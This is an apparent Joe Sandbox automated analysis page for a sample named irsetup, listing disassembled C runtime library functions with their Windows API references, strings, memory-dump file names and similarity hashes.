Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

_errno.LIBCMT ref: 0000000180027656
_errno.LIBCMT ref: 0000000180027660
_errno.LIBCMT ref: 000000018002766A
free.LIBCMT ref: 0000000180027693

Strings

COMSPEC, xrefs: 00000001800275A9
cmd.exe, xrefs: 0000000180027671

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual_lockfree
String ID: COMSPEC$cmd.exe
API String ID: 3602565165-2256226045
Opcode ID: b887252e9a82ff158cc5d0f6a798b1d26206a4203a57b46acac22f2f10929cf5
Instruction ID: 68278e6952bb5676aa1c7e33abe437adcf0fbace9db24f0e263f771a66120287
Opcode Fuzzy Hash: b887252e9a82ff158cc5d0f6a798b1d26206a4203a57b46acac22f2f10929cf5
Instruction Fuzzy Hash: 51318732304B8882EB93AF68A4857DE7391B78D3C4F558126F64D43A96DF34C60CC701

Function 00000001800218A4 Relevance: 15.2, APIs: 10, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800218D2

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180021909

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 8f3b6e9ff41334ba54332e6d1750106bbdce4b742fd25a8573c29cb5a3279734
Instruction ID: ad6dcca9d861f50b33ce47824bcecdfeea55456dd60a8eb5268593a212cc83da
Opcode Fuzzy Hash: 8f3b6e9ff41334ba54332e6d1750106bbdce4b742fd25a8573c29cb5a3279734
Instruction Fuzzy Hash: FC717031614A888AF7A7EB25E8517EA73A0B7A87C9F54C115FA49476D6DF38C60CCB00

Function 000000018002B938 Relevance: 15.1, APIs: 10, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002B961
_errno.LIBCMT ref: 000000018002B96A
__doserrno.LIBCMT ref: 000000018002B9BB
_errno.LIBCMT ref: 000000018002B9C2

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: d0536870306b69ef0be8a0b3515a67fa88222e8b226a91abf527962d6d50e32f
Instruction ID: 40da67c960e1d4e2372dec5a0354c409265d61eb1e7225161d37e6ada3604ed7
Opcode Fuzzy Hash: d0536870306b69ef0be8a0b3515a67fa88222e8b226a91abf527962d6d50e32f
Instruction Fuzzy Hash: 9C414832610A8886E7A3AF75A8427EE3755B7897E0F55C61ABB64477D3CE38C608C701

Function 0000000180027EB0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 407timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeFormatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,0000000180027C40), ref: 0000000180027FA0
malloc.LIBCMT ref: 0000000180027FF9
GetTimeFormatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,0000000180027C40), ref: 0000000180028035
free.LIBCMT ref: 0000000180028072
__ascii_stricmp.LIBCMT ref: 0000000180028109

Strings

am/pm, xrefs: 00000001800280FF
a/p, xrefs: 0000000180028161

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: FormatTime$__ascii_stricmpfreemalloc
String ID: a/p$am/pm
API String ID: 712559314-3206640213
Opcode ID: 500c3b125aa916a9b4889e827686677fef4752b90ac516746913604bc946489c
Instruction ID: cbe2ce431d5da5b9a7fad71b520a7281152b650febbd3d5ef3e97f1e640e6aa6
Opcode Fuzzy Hash: 500c3b125aa916a9b4889e827686677fef4752b90ac516746913604bc946489c
Instruction Fuzzy Hash: FBF1CD3A216698C6E7E7CF2484503ED67A1FB0DBC4F48D102FA8557A86DE398B5DE301

Function 000000018002F154 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F217
GetStdHandle.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F323
WriteFile.KERNEL32 ref: 000000018002F35D

Strings

Runtime Error!Program: , xrefs: 000000018002F1D6
Microsoft Visual C++ Runtime Library, xrefs: 000000018002F307
<program name unknown>, xrefs: 000000018002F221
..., xrefs: 000000018002F27A

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: b197fd75b0bf504f15cb967d186853a3546cccada686d32beca6375f3c352b6e
Instruction ID: 74dce0a69e53e3faa34f58e3e1ea06bdb026180a8ddaf6cfecd4a031f9f463fb
Opcode Fuzzy Hash: b197fd75b0bf504f15cb967d186853a3546cccada686d32beca6375f3c352b6e
Instruction Fuzzy Hash: 6651BD32200A4991FBB7D721A9957FA2395B78D7D8F44C52AB94982BD9CF38C30D8304

Function 0000000180030014 Relevance: 12.2, APIs: 8, Instructions: 192COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180030038

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180030064

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 83723b4061026842c1002c17d67710934d330cb8e075b7ab162c63b928ae4f1c
Instruction ID: 4870327f923fffb19be7d4a8fd62541ede676502e6ed6a30b25f36a9472d912a
Opcode Fuzzy Hash: 83723b4061026842c1002c17d67710934d330cb8e075b7ab162c63b928ae4f1c
Instruction Fuzzy Hash: B2710772A1629C42F7FB9AB59835BEF2781A38D7C4F66C505BA4542AC2CF7C87088700

Function 000000018003A584 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A5DE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A5F0
GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A63B
malloc.LIBCMT ref: 000000018003A6A0

Part of subcall function 000000018002D3E0: _FF_MSGBANNER.LIBCMT ref: 000000018002D410
Part of subcall function 000000018002D3E0: HeapAlloc.KERNEL32(?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5), ref: 000000018002D435
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D459
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D464

GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A6CD
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A707
free.LIBCMT ref: 000000018003A71B
GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A731

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale$_errno$AllocByteCharErrorHeapLastMultiWidefreemalloc
String ID:
API String ID: 1309137116-0
Opcode ID: 436e94cebb002656211ac615f83855e072fffab04320f2842f8a450889c355c1
Instruction ID: 9a90928fadca3bfaea65b2354fbc267cb61a2ea66039529c6e1bfa5df3b8ce18
Opcode Fuzzy Hash: 436e94cebb002656211ac615f83855e072fffab04320f2842f8a450889c355c1
Instruction Fuzzy Hash: E651A63620868886F7A39F15AD413DB73A1F74D7E8F5A8615FA1A43BD4CF74CA498700

Function 000000018001E0D0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000018002AF23
RtlLookupFunctionEntry.KERNEL32 ref: 000000018002AF42
RtlVirtualUnwind.KERNEL32 ref: 000000018002AF8E
IsDebuggerPresent.KERNEL32 ref: 000000018002B000
SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002B018
UnhandledExceptionFilter.KERNEL32 ref: 000000018002B025
GetCurrentProcess.KERNEL32 ref: 000000018002B03E
TerminateProcess.KERNEL32 ref: 000000018002B04C

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: 7dfd68256b6577f8bef36267e68adb4a8b092e3ee4e321cd5696b2aafa3ca8e9
Instruction ID: fc12ada8a128d6f1d404ec32f716f7f9352f897c7c547437a0ea03871e7a68a8
Opcode Fuzzy Hash: 7dfd68256b6577f8bef36267e68adb4a8b092e3ee4e321cd5696b2aafa3ca8e9
Instruction Fuzzy Hash: 5631D535104F88C6E7A29B54F8843EA73A0F78D798F518116FA8D427A5DF7DC28D8704

Function 000000018002BB84 Relevance: 12.1, APIs: 8, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
TerminateProcess.KERNEL32 ref: 000000018002BC9A

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: 72496d450d4107c48557a8d9e9b8d31312e128fbe6be5197dd2e51a830b1c4bf
Instruction ID: c71b409959ccf73f4bc98b0901178c6aebfce8d2d3a295f4eecee81b12eb3b28
Opcode Fuzzy Hash: 72496d450d4107c48557a8d9e9b8d31312e128fbe6be5197dd2e51a830b1c4bf
Instruction Fuzzy Hash: 4E312F72608B8982DB668B55F4443DBB3A4F799784F504115EACD43B99DF78C24CCB00

Function 00000001800347B0 Relevance: 10.8, APIs: 7, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00000001800347DB

Part of subcall function 0000000180035298: _errno.LIBCMT ref: 00000001800352A1

free.LIBCMT ref: 00000001800348D2

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Part of subcall function 000000018002BEE8: _errno.LIBCMT ref: 000000018002BF00

___lc_codepage_func.LIBCMT ref: 000000018003485B

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryErrorFreeFunctionHeapLastLookupPresentTerminateUnwindVirtual___lc_codepage_func_lockfree
String ID:
API String ID: 3702655603-0
Opcode ID: 2f966ea916f666462da1782ab5cc9371ebc527b73083383bbece24e9f1605637
Instruction ID: 9471dd814442db4a536cca14816e46c77906279b8aeb0443e37adca9e85ad162
Opcode Fuzzy Hash: 2f966ea916f666462da1782ab5cc9371ebc527b73083383bbece24e9f1605637
Instruction Fuzzy Hash: 83D1D33320468885E7B39F24E4917EB7795F38D7C0F42C116BA895B7A6CF38DA598B04

Function 0000000180035694 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800356C8

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

free.LIBCMT ref: 0000000180035904

Strings

cmd.exe, xrefs: 00000001800356A3

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer_errnofree
String ID: cmd.exe
API String ID: 3637258294-723907552
Opcode ID: 8cd250cef9dc04e1030a94fead8d514a1372542504ad5278bd05599df5ed4360
Instruction ID: 6943f989181965795582f8eaac26820451e32651ef6446f151c0a8e5233c8295
Opcode Fuzzy Hash: 8cd250cef9dc04e1030a94fead8d514a1372542504ad5278bd05599df5ed4360
Instruction Fuzzy Hash: 2C61273130468841FAE7E726A5117EF2391A78DBD0F55C936BE9947BE6CE38C7498700

Function 000000018002A29C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 000000018002A2DE

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018002A31C
_errno.LIBCMT ref: 000000018002A364

Strings

-, xrefs: 000000018002A458
gfff, xrefs: 000000018002A483
e+000, xrefs: 000000018002A3F6

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer_getptd
String ID: -$e+000$gfff
API String ID: 2834218312-2620144452
Opcode ID: 70437f3bfbfdb2c2965d6d3f53b1fd9d8e3e8069317ac65cfa6244339cf6166a
Instruction ID: a02038aa4d0300f9b50aee6095aae5c0a493ad474d81769f1ea6d53b9b79cc99
Opcode Fuzzy Hash: 70437f3bfbfdb2c2965d6d3f53b1fd9d8e3e8069317ac65cfa6244339cf6166a
Instruction Fuzzy Hash: C26108326086C846F7A7DB2998413DE7791F38A7D8F18C216FB5847B85CE39C64C8700

Function 0000000180039FD4 Relevance: 10.6, APIs: 7, Instructions: 138COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003A01A
_errno.LIBCMT ref: 000000018003A088
_errno.LIBCMT ref: 000000018003A093
_errno.LIBCMT ref: 000000018003A0C7
WideCharToMultiByte.KERNEL32 ref: 000000018003A162
GetLastError.KERNEL32 ref: 000000018003A182
_errno.LIBCMT ref: 000000018003A1A8

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$ByteCharErrorLastMultiWide
String ID:
API String ID: 3895584640-0
Opcode ID: 7245fe9e3f893b78d75b3df2e8976107991caa5ac0895964952ffd918a5c7e21
Instruction ID: 0496a83d19119119c06eac124665b0f9d544e026b86ecaffa96e669938c9ee47
Opcode Fuzzy Hash: 7245fe9e3f893b78d75b3df2e8976107991caa5ac0895964952ffd918a5c7e21
Instruction Fuzzy Hash: 185191326086C84AF7F79F65E8403EFB790F38A7D0F59C115B69943AC5CE68CA498B05

Function 000000018001ED40 Relevance: 10.6, APIs: 7, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018001ED71

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018001EDA9

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 9971678e4432facbc1ef1fc8bffed31b4a85e9e26782f1ce22b24466a6d4ab7e
Instruction ID: 37d480c48d6613522327dc8b80719ac5bc1941a2faed874dfcc6a4ccd8653334
Opcode Fuzzy Hash: 9971678e4432facbc1ef1fc8bffed31b4a85e9e26782f1ce22b24466a6d4ab7e
Instruction Fuzzy Hash: 49418272710B8A83F7A69E35985279E3291B79D7C8F14C136BA054B686CF3CC618D700

Function 000000018002649C Relevance: 9.1, APIs: 6, Instructions: 91COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00000001800264BF
_errno.LIBCMT ref: 00000001800264D1

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180026510

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer_lock
String ID:
API String ID: 2175075375-0
Opcode ID: db16a11e0748f8c7df55558d2753626681ae7582a959f48267dc8d83ede8206b
Instruction ID: 3db3c45d6a0b5cd1f105f54f4b3baf641d9be13896c0f45c2bade60435e83e15
Opcode Fuzzy Hash: db16a11e0748f8c7df55558d2753626681ae7582a959f48267dc8d83ede8206b
Instruction Fuzzy Hash: 4931A432B10B9942FB97AE6595527DE6390AB8D7C0F44C525BF084BBCADF3CCA198700

Function 000000018002A600 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 000000018002A655

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018002A694
_errno.LIBCMT ref: 000000018002A6D7

Strings

gfffffff, xrefs: 000000018002A9C1
0, xrefs: 000000018002A63B

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer_getptd
String ID: 0$gfffffff
API String ID: 2834218312-1804767287
Opcode ID: aa0305aa27dcb933d0da9dfb5bb8f7d0176d6c65135dee39654fcde55db1ae09
Instruction ID: b601890787595c58531ba7e6b687c0341182e1ca22c5763c78b8363e265dfe8c
Opcode Fuzzy Hash: aa0305aa27dcb933d0da9dfb5bb8f7d0176d6c65135dee39654fcde55db1ae09
Instruction Fuzzy Hash: 47B132726087CC47FBA38B2991453AE7BA5E75A7D0F14C222EB59077D2DE38CA59C300

Function 00000001800205D8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800205FB

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018002062C
_errno.LIBCMT ref: 000000018002065F

Strings

@, xrefs: 00000001800206A2

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID: @
API String ID: 2310398763-2766056989
Opcode ID: 65e2a0e65b8682a92b97ad27ec68b60d0671ab9fbfa8d204ae279d19c13defa3
Instruction ID: 6cf7d81aec9c8a7fb52b555c26e3c1199c8c24d09ef78c42bdf52907f5b2ca1f
Opcode Fuzzy Hash: 65e2a0e65b8682a92b97ad27ec68b60d0671ab9fbfa8d204ae279d19c13defa3
